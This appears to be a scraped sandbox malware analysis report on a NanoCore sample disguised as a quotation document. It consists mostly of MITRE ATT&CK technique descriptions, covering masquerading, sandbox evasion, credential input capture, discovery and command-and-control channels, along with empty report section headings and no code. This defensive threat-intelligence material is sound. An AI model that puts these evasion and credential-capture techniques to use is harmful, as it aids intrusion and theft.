Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre